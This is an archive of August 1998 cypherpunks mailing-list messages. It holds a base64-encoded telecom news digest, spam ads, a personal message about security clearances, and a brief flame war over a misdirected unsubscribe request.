YSI+VGhlIHN0YWtlcyBhcmUgaW1tZW5zZSwgY29taW5nIGFzIHRlY2hub2xv
Z2ljYWwKY2hhbmdlIGFuZCBjb3Jwb3JhdGUgY29uc29saWRhdGlvbiBjb250
aW51ZSB0byBzd2VlcCB0aHJvdWdoIHRoZSB0ZWxlY29tbXVuaWNhdGlvbnMK
aW5kdXN0cnkuICg8QSBIUkVGPSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xp
YnJhcnkvdGVjaC85OC8wOC9iaXp0ZWNoL2FydGljbGVzLzEzZGF0YS5odG1s
Ij5ORVcKWU9SSyBUSU1FUzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+SXJhIEZpc2htYW4sIENFTyBv
ZiB0aGUKU2Nob29scyBhbmQgTGlicmFyaWVzIENvcnAuLCZuYnNwOzwvRk9O
VD48L0ZPTlQ+PC9CPgo8QlI+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBTSVpFPSsxPnRvIEFubm91bmNlIERlcGFydHVyZSZuYnNw
OzwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5GaXNobWFuIGlzIGV4cGVjdGVkIHRvIGFubm91bmNlIHRvZGF5CnRoYXQg
aGUgaXMgbGVhdmluZyB0aGUgY29udHJvdmVyc2lhbCBwcm9ncmFtIHRvIGxp
bmsgc2Nob29scyBhbmQgbGlicmFyaWVzCnRvIHRoZSBJbnRlcm5ldC4mbmJz
cDsgVGhlIHByb2dyYW0gaGFzIGNvbWUgdW5kZXIgZmlyZSBmcm9tIENvbmdy
ZXNzLCB3aGljaApzYXlzIHRoYXQgdGhlIEZDQyBvdmVyc3RlcHBlZCBpdHMg
YXV0aG9yaXR5IHdoZW4gaXQgZXN0YWJsaXNoZWQgaXQsIGFuZApmcm9tIHRl
bGVjb21tdW5pY2F0aW9ucyBjb21wYW5pZXMsIHdoaWNoIHdlcmUgc2xhdGVk
IGJ5IHRoZSBGQ0MgdG8gcGF5Cm11Y2ggb2YgdGhlIGNvc3Qgb2YgdGhlIHBy
b2dyYW0uJm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vZGFpbHluZXdzLnlhaG9v
LmNvbS9oZWFkbGluZXMvd3Ivc3RvcnkuaHRtbD9zPXYvbm0vMTk5ODA4MTMv
d3Ivc3Vic2lkaWVzXzEuaHRtbCI+WUFIT088L0E+KQotICg8QSBIUkVGPSJo
dHRwOi8vaW50ZXJhY3RpdmUud3NqLmNvbS9lZGl0aW9uL2N1cnJlbnQvYXJ0
aWNsZXMvU0I5MDI5NjMzNzc3NjczODQ1MDAuaHRtIj5XQUxMClNULiBKT1VS
TkFMPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5SdXJhbCBNaW5uZXNvdGEgUmVzaWRlbnRzCldhbnQg
UGhvbmUgU2VydmljZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5EZW1hbmRzIGFyZSBiZWluZyBtYWRlIGJ5IHNvbWUg
cGVvcGxlCmluIHJ1cmFsIG5vcnRoZXJuIE1pbm5lc290YSB0byBoYXZlIHBo
b25lIGxpbmVzIGV4dGVuZGVkIHRvIHRoZWlyIGhvbWVzLgpJdCdzIHNlcnZp
Y2UgdGhleSd2ZSBuZXZlciBoYWQuIE9uZSBhcmVhIHJlc2lkZW50IHNheXMg
aGUgdXNlcyBhbiBleHBlbnNpdmUKYW5kIHVucmVsaWFibGUgInJhZGlvLXBo
b25lJycgdG8ga2VlcCBpbiB0b3VjaCB3aXRoIHRoZSB3b3JsZC4gKDxBIEhS
RUY9Imh0dHA6Ly9kYWlseW5ld3MueWFob28uY29tL2hlYWRsaW5lcy9sb2Nh
bC9zdGF0ZS9taW5uZXNvdGEvc3RvcnkuaHRtbD9zPXYvcnMvMTk5ODA4MTMv
bW4vaW5kZXhfMS5odG1sIzUiPlNUQVRFCk5FV1MgU0VSVklDRTwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
KzE+UmF5dGhlb24gUmVkdWNlcyBQcmljZQpvZiBXaXJlbGVzcyBMQU4gUEMg
Q2FyZDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj5SYXl0aGVvbiBXaXJlbGVzcyBTb2x1dGlvbnMgYW5ub3VuY2VkCml0
IGlzIHJlZHVjaW5nIHRoZSBwcmljZSBvZiB0aGUgUmF5bGluayhUTSkgd2ly
ZWxlc3MgTEFOIFBDIENhcmQuJm5ic3A7CkVmZmVjdGl2ZSBpbW1lZGlhdGVs
eSwgdGhlIG1hbnVmYWN0dXJlcidzIHN1Z2dlc3RlZCByZXRhaWwgcHJpY2Ug
d2lsbCBiZQokNDk1LjAwIChVLlMuKSByZXByZXNlbnRpbmcgYSAkNTUuMDAg
ZGVjcmVhc2UgZnJvbSBwcmV2aW91cyBwcmljZXMuICg8QSBIUkVGPSJodHRw
Oi8vYml6LnlhaG9vLmNvbS9idy85ODA4MTIvcmF5dGhlb25fd18xLmh0bWwi
PllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5QdWJsaWMgU2VjdG9yIFRyYWlscwppbiBZMksg
Rml4ZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+QSBzdHVkeSwgYnkgQ2FwIEdlbWluaSBBbWVyaWNhLCBhIHRlY2hu
b2xvZ3kKc2VydmljZXMgYW5kIGNvbnN1bHRpbmcgZ3JvdXAsIGZvdW5kIHRo
YXQgdGhlIHB1YmxpYyBzZWN0b3IgaXMgMTYgcGVyY2VudApiZWhpbmQgdGhl
IGxlYXN0IHByZXBhcmVkIHByaXZhdGUgaW5kdXN0cnkgY2F0ZWdvcnkuJm5i
c3A7IEFtb25nIHRoZSBuYXRpb24ncwpiaWdnZXN0IGNvcnBvcmF0aW9ucywg
dGhlIGhlYWx0aCwgdHJhbnNwb3J0YXRpb24sIGFuZCB1dGlsaXR5IGluZHVz
dHJpZXMKYXJlIGZ1cnRoZXN0IGJlaGluZCBpbiBkZWFsaW5nIHdpdGggWWVh
ciAyMDAwIGNvbXB1dGVyIHByb2JsZW1zLiBUaGUgQ2FwCkdlbWluaSBzdXJ2
ZXkgY29uc2lzdGVkIG9mIGludGVydmlld3Mgd2l0aCBJVCBtYW5hZ2VycyBh
dCAxMTYgb2YgdGhlIG5hdGlvbidzCmNvcnBvcmF0aW9ucyBhbmQgMTQgZ292
ZXJubWVudCBhZ2VuY2llcy4gKDxBIEhSRUY9Imh0dHA6Ly93d3cubmV3cy5j
b20vTmV3cy9JdGVtL1RleHRvbmx5LzAsMjUsMjUyMTYsMDAuaHRtbD9wZnYi
PkNORVQ8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPkNXQSBTdHJpa2UgQWdhaW5zdCBVClMgV0VTVCBM
b29raW5nIE1vcmUgTGlrZWx5PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPlNwb2tlc21lbiBmb3IgYm90aCBzaWRlcyBz
YXkgdGhhdCBwcm9ncmVzcwppcyBzbG93IG9uIGtleSBpc3N1ZXMgc3VjaCBh
cyB2YWNhdGlvbiB0aW1lIGFuZCBhIGNvbXBhbnkgcHJvcG9zYWwgdG8gbGlu
awpjdXN0b21lciBzZXJ2aWNlIHRvIGVtcGxveWVlIHBheS4gKDxBIEhSRUY9
Imh0dHA6Ly9kYWlseW5ld3MueWFob28uY29tL2hlYWRsaW5lcy9sb2NhbC9z
dGF0ZS93eW9taW5nL3N0b3J5Lmh0bWw/cz12L3JzLzE5OTgwODEzL3d5L2lu
ZGV4XzEuaHRtbCMyIj5TVEFURQpORVdTIFNFUlZJQ0U8L0E+KTwvRk9OVD48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkJl
bGwgQXRsYW50aWMgYW5kIElCRVcKaW4gTmV3IEVuZ2xhbmQgUmVhY2ggQWdy
ZWVtZW50Jm5ic3A7PC9GT05UPjwvRk9OVD48L0I+CjxCUj48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+b24gTmV3IENv
bnRyYWN0cyZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5VbmRlciB0aGUgbmV3IGNvbnRyYWN0cywgd2FnZXMg
d2lsbCBpbmNyZWFzZQpieSB1cCB0byAzLjggcGVyY2VudCBlZmZlY3RpdmUg
QXVnLiA5LCAxOTk4LCBhbmQgdXAgdG8gNCBwZXJjZW50IGVmZmVjdGl2ZQpB
dWcuIDgsIDE5OTkuJm5ic3A7IFBlbnNpb25zIHdpbGwgaW5jcmVhc2UgYnkg
YSBtaW5pbXVtIG9mIDIwIHBlcmNlbnQgb3Zlcgp0aGUgdHdvLXllYXIgbGlm
ZSBvZiB0aGUgbmV3IGFncmVlbWVudC4gKDxBIEhSRUY9Imh0dHA6Ly93d3cu
d293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWlu
ZGV4LmNmbT9hcnRpY2xlaWQ9MzE3MyI+V09XLUNPTTwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U3By
aW50IFRyaWVzIE5ldCBQaG9uZQpTZXJ2aWNlPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlNwcmludCBhbm5vdW5jZWQg
dG9kYXkgdGhhdCBpdCBwbGFucyB0bwp0cnkgb3V0IGEgcGhvbmUtdG8tcGhv
bmUgc2VydmljZSB0aGF0IHVzZXMgaXRzIEludGVybmV0IFByb3RvY29sIGJh
Y2tib25lCnRvIGNhcnJ5IGNhbGxzIGluc3RlYWQgb2YgdGhlIHJlZ3VsYXIg
cGhvbmUgbmV0d29yay4gVGhlIHByb2dyYW0sIGR1YmJlZApDYWxsdGVybmF0
aXZlcywgd2lsbCBiZWdpbiBpbiBmaXZlIFUuUy4gY2l0aWVzIChBdGxhbnRh
LCBEYWxsYXMsIExvcyBBbmdlbGVzLApTYW4gRnJhbmNpc2NvLCBhbmQgU2Vh
dHRsZSksIGFuZCBjdXN0b21lcnMgd2lsbCBiZSBhYmxlIHRvIGNhbGwgdGhy
b3VnaG91dAp0aGUgVW5pdGVkIFN0YXRlcyBhcyB3ZWxsIGFzIG90aGVyIGNv
dW50cmllcyBpbmNsdWRpbmcgSW5kaWEsIEphcGFuLCBNZXhpY28sClNvdXRo
IEtvcmVhLCBhbmQgVGFpd2FuLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5uZXdz
LmNvbS9OZXdzL0l0ZW0vVGV4dG9ubHkvMCwyNSwyNTIxNSwwMC5odG1sP3Bm
diI+Q05FVDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9u
YWwgbmV3cyBhYm91dAp0aGUgd2lyZWxlc3MgaW5kdXN0cnktLWluY2x1ZGlu
ZyBwZXJpb2RpYyBuZXdzIHVwZGF0ZXMgdGhyb3VnaG91dCB0aGUgZGF5LS12
aXNpdAo8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tIj5odHRwOi8v
d3d3Lndvdy1jb20uY29tLjwvQT48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0i
MTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
LTE+Q1RJQSBEYWlseSBOZXdzIGZyb20gV09XLUNPTQppcyB0cmFuc21pdHRl
ZCB3ZWVrZGF5cywgZXhjZXB0IGZvciBob2xpZGF5cy4gVmlzaXQgdXMgb24g
dGhlIFdvcmxkIFdpZGUKV2ViIGF0IDxBIEhSRUY9Imh0dHA6Ly93d3cud293
LWNvbS5jb20vcHJvZmVzc2lvbmFsIj5odHRwOi8vd3d3Lndvdy1jb20uY29t
L3Byb2Zlc3Npb25hbDwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsK
CjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0t
MT5JZiB5b3UgYXJlIG5vdCBpbnRlcmVzdGVkCmluIHJlY2VpdmluZyB0aGUg
Q1RJQSBEYWlseSBOZXdzIGZyb20gV09XLUNPTSwgcGxlYXNlIHNlbmQgYSBt
ZXNzYWdlIHRvCjxBIEhSRUY9Im1haWx0bzp1bmpvaW4tQ1RJQV9EYWlseV9O
ZXdzQHVtMi51bml0eW1haWwuY29tIj51bmpvaW4tQ1RJQV9EYWlseV9OZXdz
QHVtMi51bml0eW1haWwuY29tPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZu
YnNwOwoKPFA+PEI+KioqPEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPS0xPiBUaGUgdGVybSAidW5qb2luLUNUSUFfRGFpbHlfTmV3
c0B1bTIudW5pdHltYWlsLmNvbSIKbXVzdCBiZSBsaXN0ZWQgaW4gdGhlIFRP
IHNlY3Rpb24gb2YgdGhlIGVtYWlsLjwvRk9OVD48L0ZPTlQ+ICoqKjwvQj4m
bmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0tMT5QbGVhc2UgTm90ZTogU29tZSBvZiB0aGUKbGlua3MgaW4gdG9k
YXkncyBuZXdzIGFyZSB0aW1lIHNlbnNpdGl2ZS4mbmJzcDsgVGhvc2UgbGlu
a3MgbWF5IG5vdCBiZQphdmFpbGFibGUgYXMgbmV3cyBjaGFuZ2VzIHRocm91
Z2hvdXQgdGhlIGRheS4mbmJzcDsgQWxzbywgc29tZSBuZXdzIHNvdXJjZXMK
bWF5IGJlIHN1YnNjcmlwdGlvbi1iYXNlZCBvciByZXF1aXJlIHJlZ2lzdHJh
dGlvbi48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgo8L1RBQkxFPjwvQ0VOVEVSPgoKPENFTlRFUj4mbmJz
cDs8L0NFTlRFUj4KCjwvQk9EWT4KPC9IVE1MPgo=
--Boundary..3995.1071713794.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: serv@juno.com
Date: Thu, 13 Aug 1998 14:41:23 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: FOR PEOPLE WITH EXPENSIVE TASTES!
Message-ID: <199808132141.OAA13056@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You'll fall in love with my Grandma's prize-winning salad 
dressing recipe. It has just the right touch of garlic, olive 
oil, and certain other old-world special ingredients. Best of 
all, it has the power to turn ordinary iceburg lettuce into 
something amazing. Whenever we serve it people ask for more 
salad! And they look at you like, "What's in this anyway?" 

It's a real bargain at only $2.00!
 

=================================================================
===========================

Please send cash or make check or money order payable to RECIPES 
BY GRANDMA and mail along with your email address to:

RECIPES BY GRANDMA
POST OFFICE BOX 296 
MARLBOROUGH, CONNECTICUT 06447


Be sure to include YOUR email address!
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 13 Aug 1998 09:21:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808131621.SAA29663@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


'What are you going to do, classify prime numbers?'

'There are a thousand reasons to have this with you, but mostly its for the
things
we can't think of' 

'What interests me is that it recorded 18 hours of static...'

------All quotes from _Contact_









	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 13 Aug 1998 18:01:25 -0700 (PDT)
To: senator@wyden.senate.gov
Subject: Hungary
Message-ID: <35D38B46.7FAB@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

h 8/13/98 6:10 PM

Laszlo Baranyi, lb@qainfo.se

Got a phone message on my recorder this afternoon.

The speaker, a native Hungarian, read something about you.

The speaker told me that Laszlo Baranyi sounded like a Hungarian name.

The speaker wanted your e-mail address.

No problem.

http://www.qainfo.se/~lb/crypto_ag.htm

BUT, do not WRITE ANYTHING which will get ANY ONE OF US into trouble on
the
Infobahn.  

We  http://www.wpiran.org/, of course, are trying to AVOID TROUBLE and
GET THINGS SETTLED.

FORGET encryption, anonymous re-mailers, etc.
http://www.villagevoice.com/ink/news/33vest.shtml

Konrad Roeder was a technican when I was project leader on the Missile
Secure
Cryptographic Unit.  Small missile.

Roeder was born in Germany.

Roeder is a ham operator.

Roeder DID NOT GET HIS Q clearnace for over two years.

Finally, Roeder complained.

DOE brought Roeder in for an interview.

DOE PLAYED TRANSCRIPTS of radio communications Roeder had with a fellow
in 
Spain.

Turned out that the fellow in Spain was head of the Spanish Communist
Party.

I met the speaker through Bob Wayland.

  5023    J. R. Wayland Jr. seen at http://jya.com/da/whpda.htm

I did not know Wayland at the time I was fired.

The SAME group that fired me also went after Wayland.  

This group was led by C. William Childers.

Cost Wayland more than $11k in legal fees to save his job.

Wayland's wife is a lawyer and lined him up with a fellow lawyer.

Wayland and I met a Einstein's Bagels this morning to discuss
IMPLEMENTING some ideas
Wayland has for surveying oil pipeline integrity.

Wayland and I have MADE MONEY on other consulting projects.

Making money on CONSTRUCTIVE projects is LOTS more fun than all of the
spy
crap.  

Beside, the spies keep getting caught.   This PLEASE ME.

Like Otstavnov http://www.jya.com/pgpi-x-ru.htm and MORE IMPORTANT
http://www.ice.ru/otstavnov

MOST are not spies. 
http://www.semionoff.com/cellular/hacking/phreaking/

ONE of my PRIMARY JOBs is to help others implement their data gathering
and control ideas INEXPENSIVELY. http://jya.com/f86/whpf86.htm  

I like to write about this.  This is CONSTRUCTIVE.

Let's all hope for settlment of the UNFORTUANTE matter.

Later
bill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 13 Aug 1998 16:08:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <1acddf5dfcf1e4a1a66d38fae3d138b9@anonymous>
Message-ID: <Pine.LNX.3.96.980813185705.12286A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Aug 1998, HyperReal-Anon wrote:

> > our address that the mail is being sent to is: sysadmin@thegrid.net
> > we appreciate your mail but the volume is slightly overwelming for us to
> > handle..
> > sincerely, burke bryant
> > 
> > 
> 
> Take yourself off, you mental midget.

Come now. Is there any reason to insult midgets by comparing them to
this guy? :)

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"If you die, you win.."
	John Landry, statistics professor discussing life insurance 
	and probability





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reply@adultcontent4u.com
Date: Thu, 13 Aug 1998 22:25:00 -0700 (PDT)
To: @toad.com
Subject: Own a complete adult site for $19.95
Message-ID: <199808140524.WAA18547@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Want to Make Money on the Internet?  Start Your Own
ADULT WEB SITE for only $19.95... with Quik Site!

* We supply Hosting and Credit Card Processing.

* We supply Content... Nothing to Set-Up or Upload.

* We give you High Quality Video Feeds!

* Hot Chatroom for your Site!

* We give you Original Photos featuring Gorgeous Models!

* We do all the Work... YOU MAKE THE MONEY!

Design your own Adult Site online in 10 Minutes and
START MAKING MONEY TONIGHT!      
Absolutely NO OTHER CHARGES involved in making these sites!    

http://www.adultsiteservices.com/cquiksite       


If you would like to be removed from this list please send a message to: remove@adultcontent4u.com and 
put the word REMOVE in the SUBJECT







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 13 Aug 1998 15:26:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <1acddf5dfcf1e4a1a66d38fae3d138b9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Aug 1998, Entropy wrote:

> 
> please take us off your mailing list.
> 
> our address that the mail is being sent to is: sysadmin@thegrid.net
> we appreciate your mail but the volume is slightly overwelming for us to
> handle..
> sincerely, burke bryant
> 
> 

Take yourself off, you mental midget.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILovToHack@aol.com
Date: Thu, 13 Aug 1998 19:55:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: sysadmin@thegrid.net
Message-ID: <218be575.35d3a6f2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>> On 13 Aug 1998, HyperReal-Anon wrote:
>> 
>> > > our address that the mail is being sent to is: sysadmin@thegrid.net
The interesting fact here is that you all seem to have nothing better to do
with your time than converse over something so petty as an address error.....
I think you need to re-evaluate who the mental midgets are.....
I would hope the future of our world isn't in the hands of such petty
people such as yourselves...



> > > we appreciate your mail but the volume is slightly overwelming for us to
>> > > handle..
>> > > sincerely, burke bryant
>> > > 
>> > > 
>> > 
>> > Take yourself off, you mental midget.
>> 
>> Come now. Is there any reason to insult midgets by comparing them to
>> this guy? :)
>
>Quite right. Most vertically-challenged individuals are upstanding members
>of society and of at least average intelligence. They don't deserve to be
>compared to this guy. :) 
>
>I would call him a moron, but then I'd be insulting morons. 
> 
Come on thake it easy on the guy at least he aint on AOL or somthing stuped.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 13 Aug 1998 18:43:16 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: http://209.1.31.51/98/8/13/
Message-ID: <19980813234523.20374.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://209.1.31.51/98/8/13/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 13 Aug 1998 17:16:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <e1784fb338f4b745dc7e7a74a89178e6@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


> On 13 Aug 1998, HyperReal-Anon wrote:
> 
> > > our address that the mail is being sent to is: sysadmin@thegrid.net
> > > we appreciate your mail but the volume is slightly overwelming for us to
> > > handle..
> > > sincerely, burke bryant
> > > 
> > > 
> > 
> > Take yourself off, you mental midget.
> 
> Come now. Is there any reason to insult midgets by comparing them to
> this guy? :)

Quite right. Most vertically-challenged individuals are upstanding members
of society and of at least average intelligence. They don't deserve to be
compared to this guy. :) 

I would call him a moron, but then I'd be insulting morons. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 13 Aug 1998 20:56:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <baf054922c00d3974683344af3653021@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Aug 1998, Entropy wrote:

> 
> At 06:37 PM 8/13/98 -0700, you wrote:
> >
> >> On 13 Aug 1998, HyperReal-Anon wrote:
> >> 
> >> > > our address that the mail is being sent to is: sysadmin@thegrid.net
> The interesting fact here is that you all seem to have nothing better to do
> with your time than converse over something so petty as an address error.....
> I think you need to re-evaluate who the mental midgets are.....
> I would hope the future of our world isn't in the hands of such petty
> people such as yourselves...
> 
> 

It's more like making an example out of yet another moron who doesn't have
a clue where to send. You're tempting because you advertise that you're a
sysadmin. 

I'll remember to never do business with your company.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fiy46@werker.com (Internet Sales)
Date: Fri, 14 Aug 1998 02:56:06 -0700 (PDT)
To: fiy46@werker.com
Subject: Now is the Time! National Credit Card Accounts!
Message-ID: <199808141372PAA25713@Oliver.goodacre.com>
MIME-Version: 1.0
Content-Type: text/plain


<A HREF="http://www.remove-list.com/">Click here to be removed from future
mailing</A>
NO CREDIT TURN-DOWNS
Now you can accept Credit Card Payment On Your Website
- Do you sell a product or service?
- Would you like to sell anything on the Internet?
98% of all internet sales are made with Credit Cards
Call 1-800-899-2218  
- You can process credit cards right from your computer
- Funds are directly deposited into your checking account 24 - 48 hours from
the time of purchase!!  Now that is FAST

Did you know, Internet shopping is DOUBLING every 100 days
 
You see, there are really only 2 types of people on the internet, those who
spend money, and those who make money.  WHICH CATEGORY WILL YOU BE IN ????
Call 1-800-899-2218  
GET YOUR MERCHANT ACCOUNT TODAY!!!


<HTML><PRE><BODY BGCOLOR="#80ffff"><a
href="http://www.remove-list.com/">Click here to be removed from future
mailing</A>
<FONT COLOR="#000000" SIZE=5><B>NO CREDIT TURN-DOWNS
</P><P ALIGN=CENTER><FONT COLOR="#000000" SIZE=3><U>Now you can accept
Credit Card Payment On Your Website</U>
</P><P ALIGN=LEFT><FONT COLOR="#400080" SIZE=3>- Do you sell a product or
service?
- Would you like to <U><I>sell anything on the Internet?
</P><P ALIGN=CENTER></FONT><FONT COLOR="#000080" SIZE=4></U></I>98% of all
internet sales are made with Credit Cards
<FONT COLOR="#000080" SIZE=5>Call 1-800-899-2218<FONT COLOR="#000080"
SIZE=3>  
